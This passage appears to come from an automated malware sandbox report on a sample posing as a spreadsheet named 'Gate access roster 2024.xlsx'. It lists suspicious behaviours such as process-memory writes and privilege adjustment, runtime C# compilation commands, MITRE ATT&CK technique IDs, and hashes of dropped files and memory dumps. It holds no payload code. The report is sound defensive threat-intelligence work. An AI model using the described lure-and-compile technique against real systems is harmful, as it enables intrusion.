- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\do5-zle8.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4174.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4173.tmp"
7⤵
PID:1180

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lanodltz.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES41D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC41D1.tmp"
7⤵
PID:2436

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v1ejxrwj.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES423F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC423E.tmp"
7⤵
PID:1120

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tpfw-ohu.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42BC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC42BB.tmp"
7⤵
PID:1084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Gate access roster 2024.xlsx

Filesize
11KB

MD5
eb458bc6415bc39bf7c4b82ca70af6b0

SHA1
93af7b44999b343ae824d5d8841737b1f826457f

SHA256
dd3803ade05abe200bac8cb34247b4318b45fc8e731f4f1b4a2f26f613201d07

SHA512
dadc879e5b0c7a863702a3ecd53d70c855616699b60ba9a5d224934b8bccaab662f3ee7115a342a49a25557e4223a98c22aedca38ce526647221590e58c52ebd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4174.tmp

Filesize
1KB

MD5
5adb5fd0427c5a9946158d92bb234bba

SHA1
af580d7ac892cc57cd2a6a191193efd8cc47afff

SHA256
55c670a2cee0633fe9e1b12f154ceff570da124116d93fd4d9fde5ba2552814b

SHA512
2b747ccdcda1a7709c5d0fcf0d9f426705d7e2e461a52557b6e7d42a11b81c5a75e7ccc30c720d5c8741fa7ad2bfcc9fa692c92a0c7affe134b3fd2398820968

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES41D2.tmp

Filesize
1KB

MD5
9c10ebfbce986aef3a0ac413f846363b

SHA1
ac48411bb1b43762b4bc8dd175ec3fb7ee4d7103

SHA256
2bf71c00fa43bfabf5abce3078b2017deb2012ee002b53935d4e9548fb827768

SHA512
17505f49680f4b8c0f33346974ee9f37f4b970ccbb7e6655d8ef1a05deaa4a33937c6d56d42996c2f29815f6c1f05b932b64980696a4eceb5fc28b4d3f2c1605

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES423F.tmp

Filesize
1KB

MD5
5ed1406369344c66cfd58ded469e2aa7

SHA1
12201ad1c04faca3e6b96ca1a000cc236d4cdfd1

SHA256
ba4805334e0f736ef1f60d795eee79af1a36b3956f01dc45d3fd2e7526fda5d9

SHA512
2bf1ed807b709d5f5e5329e09bc68a493a0fa30fa014e201d35be6ff671ab184b79b535525e2580d4189fd002041a8c22c398559ae9d28d15275b9fe711d8eb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES42BC.tmp

Filesize
1KB

MD5
2db481f0a5fb5e811d841c03493dec74

SHA1
fc718395d2131fa484fe9701f6f20ee5569ea2de

SHA256
43f514764d6ed157bfbd36319b6699250fdadd1eaef939bc52ddc6c21cf7655c

SHA512
47af24b88ae3966638f19ac48e87120b68a5cf57e6d2d425c7e3959d3c83ba121f5015d0a536a8472710f85a0273f16c0d5111d8e91540335e809db8e565f89c

Download Submit
C:\Users\Admin\AppData\Local\Temp\do5-zle8.dll

Filesize
3KB

MD5
e8a9b9e698a3656b7b35286d229f9987

SHA1
950692abcafd332cf2ea10af6882fadf07e1dda5

SHA256
a4d54f36fdda10ffd897524a9a529db9034ae4fe90940c979a1ae515f325c0fd

SHA512
d167d26bf25e04a786c4df286541929d55dcce9b3bee186bad00b147a3576bb9d605380b3ddabf302beed289ad24d1a94cb17af5fac9ec5137006638b847af0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\do5-zle8.pdb

Filesize
7KB

MD5
710001343d56795d0d4cafb4fc3a0e61

SHA1
330ac1342b02526d8ebe3c9dacb0f6a804f9b008

SHA256
06a1f89746a1ef8fa867fc512dbe53919fefcc7555324426e39b7c39b3b00631

SHA512
861c68dad2e5c5564e2a7d43be103c29cbd6fff0d5e18ab347dd42139e34f279921bd42aa3212e8ba961f0772b502fa0fb37eea633f9f6e8fb56665f6917527b

Download Submit
C:\Users\Admin\AppData\Local\Temp\lanodltz.dll

Filesize
3KB

MD5
8c3e6414f1f213ea2e6aa0fb3e53ab9a

SHA1
dcc4ade5c2407114935c831bfca993a1f3c70b48

SHA256
406e44b2915876215788a5ef5682100a32861c128792a78e471ea0b3933daabe

SHA512
d27729f8ff15b8b8924cafad85787e10b0edaa7f0c4b195e8a02b6ec3986988483058cd21146087c0df1b9081feb8438ff800442fca1039df1c7cd01961f50a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\lanodltz.pdb

Filesize
7KB

MD5
2fe893dd5316fc2107aa67085ff04fc8

SHA1
489d075083e62fc41f25f82ad896543b3fccc5aa

SHA256
8b6cab439e0f3c02584b532ac7fd30a6899dbaec3ee755ab3e77ce2055cd5573

SHA512
ee2f2b90145265fb81913c603c4995fc7d1f08a544224d1d610e613571a6ae010941397a445f17c67c68b81656a608d7094791374eea2c9b3b547aef285048d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tpfw-ohu.dll

Filesize
3KB

MD5
a9fc8a533113d41fc60bbfe4180733f7

SHA1
8614a531a18c70b861686db78d116d1461f4bd04

SHA256
731f0413b50641b625506ee239640dc28bc699cafc812529ec582a82a784cc1c

SHA512
c24ed9d1835574aa32a5023c1a3c05317d50a9aaaf364186e6df290477800df5a5aae100e104b8df6b4f046a78d1432a299dbef27b0c605ecc3f5a64b00e6133

Download Submit
C:\Users\Admin\AppData\Local\Temp\tpfw-ohu.pdb

Filesize
7KB

MD5
599fa9bd7da4edbda00ac3907e16c3e3

SHA1
6f00fb2ed27e0e86db4f46b6c5cf18a39dca3ea1

SHA256
9bca8be0961f56b66eb56374743190e1e52359061024c9b0c1762dd3f930ec22

SHA512
dd5916494ca2a3298fc6ef4977e02fa64f1a296d238021fa5c309e3cb53e04cef2c3654b9e22a855a1a006c400bf8d0481ee7608bb4721caf734eddc8a4162cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\v1ejxrwj.dll

Filesize
3KB

MD5
d10fd9e0bcb694f3946f4a97f8e3b9be

SHA1
f30e563e81923e8e41188ec111cbefd02c3d3f4c

SHA256
f5a05ad2891fc15cc96459b32cec2de2dd713b81018c259113ccafb84ea668a6

SHA512
f2f9e07a3c9e9e4c2a70c1a0b0430b4596d94d8b0714d3aaac52591d30ca38802863ca9fe210210f1b002c9ea411c3a76ac5901de2bdbb5ed8725e04d1847481

Download Submit
C:\Users\Admin\AppData\Local\Temp\v1ejxrwj.pdb

Filesize
7KB

MD5
2a994aa11ad0721caf097f29eda7581c

SHA1
86881bea224d1497f029a63aa22bfeec3ae0ebdb

SHA256
3cb8cd61ee5c228273f190ef5bd9b28eb93601fd2e28ed66448d129f7a0a4ece

SHA512
2ef67b7ac8b5175eb5111d3199bc508e22ee11a53933e7584708c0d059b5bbea6808519080556caaa50738e741ca127e4b3fbbb7cc9e5d92df3c293939a0e0b7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b6e528dfbd97ccd4c8a3cb0d954e093e

SHA1
264024e99acd781f806730516112c211e60b7171

SHA256
6854983d151d43e194af84c38aac93bbe6787c625d41a26be2077771d8719d33

SHA512
4bb3b6e725a70e10c6b608104ae98d83215d1747ac63e5db3d3bbdc6e843ed8570c0ed5c46d0ea56e6cea7914434b2bba60dbe097e8a6ae59dc90e38a4584354

Download Submit
C:\Users\Public\find.bat

Filesize
315B

MD5
35441efd293d9c9fb4788a3f0b4f2e6b

SHA1
eb02c53e6f42219096e7ea5d274c08548255b289

SHA256
f1811cac3da8f47266efba84d96127bbd19b265e8d477ff1d245281042790e89

SHA512
d539a96c474b1a6fb0a731bfd858333bde17161c943736015cb4c7094fc3fedb4f314f0eadd7be169488119a58392a53f52a65bf910bb37791444c08cbcc6a03

Download Submit
C:\Users\Public\search.dat

Filesize
1KB

MD5
68386fa9933b2dc5711dffcee0748115

SHA1
12e52c446b17a83cbd38d2a382c996410ddf4abf

SHA256
3dd8da415dcbe9376b54cf04b36159a240afca9082a73397f4bd809fb6281760

SHA512
ea95c8bf213cf111e0dc0a3bd897af0d6b35f04e6b6e242ee54ea3f2a2e5c504c178717ad80aac7d9c1246e9070b27b683c68f21aa9160c0319b7967b718ec78

Download Submit
C:\Users\Public\viewer.dat

Filesize
869KB

MD5
bd07b927bb765ccfc94fadbc912b0226

SHA1
ce52d2b59d00ad32696ac091f05846bdab692c4a

SHA256
2ae727feffb939434fd9c3804517d868fbe42a8e2d66fd0eef9fa14f3e9c7a27

SHA512
3b82448ced5916a18990060db352a9174a9e09c81f863f80c4d993b0500681c8de14c325ff321be465849227a36245a7e8777bc55b75de5bd6372dcfef33632b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4173.tmp

Filesize
652B

MD5
3df7b45cb514ef791188b60e4ba20f2a

SHA1
c0596f7bb24aa34161401bc56eb0d6c6c485fdcc

SHA256
6101f887d93d2c89be4a196e3eab2f55e8b1ef59d86f168c16bb0dd7df0c1946

SHA512
39dfe72d40014f0bebe241ab8fa6cc80b26f93df42fff48e6e596cf982a5bf825fc0fa4288fff65e6f2bb8197530e96c3b877ec26a60c954d800fb0ab60482b5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC41D1.tmp

Filesize
652B

MD5
57652e6028ac479921979a1bdf4f5866

SHA1
7c2c538ff6ebfb5d48a79730e3ca89c0463243ca

SHA256
83d007994dfada4b0f9c840791949ae6c5103518a2a807805efbecffe9cf88f7

SHA512
c7d624e5929c5f4c2b38eb86919a260d90e31be140cfeeac4b2f47d5bc67c55c64c69c11151accbef54fbce494014977cab57870f94b48c56d73e38fa43bb2f1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC423E.tmp

Filesize
652B

MD5
d9934269b7493b62fcabb38669dcf6a1

SHA1
391ef39273f66150add404c3ed8d5779e43fa043

SHA256
4c3bd03fcf0d466ec6b499e7be0587e7ef186da11292a830e0490fddd7ab56c8

SHA512
10295139438e082e28908605ae471f24db903710754a9354053939c484b315530096046d9293a90d18111bac326eb09d31be48f60f5e037de5d3ebd1a5a5f549

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC42BB.tmp

Filesize
652B

MD5
aec0335f4a7debc77cd40404de0b0b4c

SHA1
60fe87a79cd4a05cf7a11730e8d3398eab25752e

SHA256
c9fb82adfc8b9b43158917a53da697df67aedbff4712266e99779c9922e39fdf

SHA512
53688346dc63020d5e78d60a90991458b787797ebb5d80e6e634c2ab0e33f9a0f1b6f4e4ebfc5c2e9609d8147007b1796d313332d01641454ce31d6335c7cbd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\do5-zle8.0.cs

Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\do5-zle8.cmdline

Filesize
309B

MD5
ace6a9fddc27bb9936c94c3f8c859816

SHA1
df5063d4f4ddcc3b46bba11294e2955b4d2366f2

SHA256
f6b20ee8482bead81802105268071b9ad2f32e085652b6ecd7e3209c73ce6b48

SHA512
2a07b7e74dba02d4882fa7209addac905274b8b082b73984c056ae87f5da429fdbfb2fffd8fa530a6596f76ab02fcfaef03a1edb98edebd2a24dae2d5607ccc4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lanodltz.0.cs

Filesize
272B

MD5
4de985ae7f625fc7a2ff3ace5a46e3c6

SHA1
935986466ba0b620860f36bf08f08721827771cb

SHA256
53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

SHA512
067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lanodltz.cmdline

Filesize
309B

MD5
113bb5c02fc5b592a4cc5f83952d1911

SHA1
c1b274239592a7bedc8cad32481d5932d76bf22a

SHA256
3303b7fed1bdff7f1780ee71d204224454652b63dcf4b3db1a55da7f8c321bde

SHA512
8b0b9d364fb9fa2f2ec3bd12eef700442cadeffbb0178c2f8063219b2771ad71c681aa1b3668adbf1174205af7fc08f00f9bc9cb408c33bb27a23248734b0021

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tpfw-ohu.0.cs

Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

SHA512
041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tpfw-ohu.cmdline

Filesize
309B

MD5
1c65b4857fd21ae7d2f80d22a56f5e6e

SHA1
5bcc121ad42126346f7db9433ed987058cbe1432

SHA256
f58a0e138f8a93476b79b1f52c6461168449433122cef6c9bc45e632807172bc

SHA512
d65a0c591748f920d3e1d9de8a170c7e2050aabf103008f0ca1a9ea9cd487ed5fc0fbeeeb972a698aa7396854b2c0bf4a752512bb016c3326a349a64c3c0a068

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v1ejxrwj.0.cs

Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v1ejxrwj.cmdline

Filesize
309B

MD5
f4277a0677b6063b1a0f2616303fe690

SHA1
5d696b26ebb316d7245f5db677cc19b52b493d68

SHA256
e79b12ec350d3baa7a9acb8707f6559ebeacda81c54f75980bff941f7d085129

SHA512
b3f8b4e079c34d4ee31ab4d5d8d30648db3880fc7b6ef350acec0a577cde21b8c56768bcc5500107cf5da93e9962697fc29cce5f87e126e69098ec9ad901f0bd

Download Submit
memory/672-105-0x00000000003C0000-0x0000000000400000-memory.dmp

Filesize
256KB

Download
memory/1596-73-0x0000000000490000-0x00000000004D0000-memory.dmp

Filesize
256KB

Download
memory/1664-89-0x0000000001FE0000-0x0000000002020000-memory.dmp

Filesize
256KB

Download
memory/2188-137-0x000000006EBCD000-0x000000006EBD8000-memory.dmp

Filesize
44KB

Download
memory/2188-44-0x000000006EBCD000-0x000000006EBD8000-memory.dmp

Filesize
44KB

Download
memory/2188-43-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2188-146-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2188-147-0x000000006EBCD000-0x000000006EBD8000-memory.dmp

Filesize
44KB

Download
memory/2588-40-0x0000000002B80000-0x0000000002BC0000-memory.dmp

Filesize
256KB

Download
memory/2588-56-0x00000000738C0000-0x0000000073E6B000-memory.dmp

Filesize
5.7MB

Download
memory/2588-38-0x00000000738C0000-0x0000000073E6B000-memory.dmp

Filesize
5.7MB

Download
memory/2588-39-0x00000000738C0000-0x0000000073E6B000-memory.dmp

Filesize
5.7MB

Download
memory/2588-41-0x0000000002B80000-0x0000000002BC0000-memory.dmp

Filesize
256KB

Download
memory/2748-67-0x0000000002830000-0x0000000002870000-memory.dmp

Filesize
256KB

Download
memory/2748-131-0x0000000005270000-0x000000000534A000-memory.dmp

Filesize
872KB

Download
memory/2748-132-0x0000000005270000-0x000000000534A000-memory.dmp

Filesize
872KB

Download
memory/2748-133-0x000000000C520000-0x000000000C603000-memory.dmp

Filesize
908KB

Download
memory/2748-134-0x000000000C520000-0x000000000C603000-memory.dmp

Filesize
908KB

Download
memory/2748-62-0x0000000072EC0000-0x000000007346B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-138-0x0000000072EC0000-0x000000007346B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-139-0x0000000002830000-0x0000000002870000-memory.dmp

Filesize
256KB

Download
memory/2748-140-0x0000000002830000-0x0000000002870000-memory.dmp

Filesize
256KB

Download
memory/2748-141-0x0000000002830000-0x0000000002870000-memory.dmp

Filesize
256KB

Download
memory/2748-63-0x0000000002830000-0x0000000002870000-memory.dmp

Filesize
256KB

Download
memory/2748-64-0x0000000072EC0000-0x000000007346B000-memory.dmp

Filesize
5.7MB

Download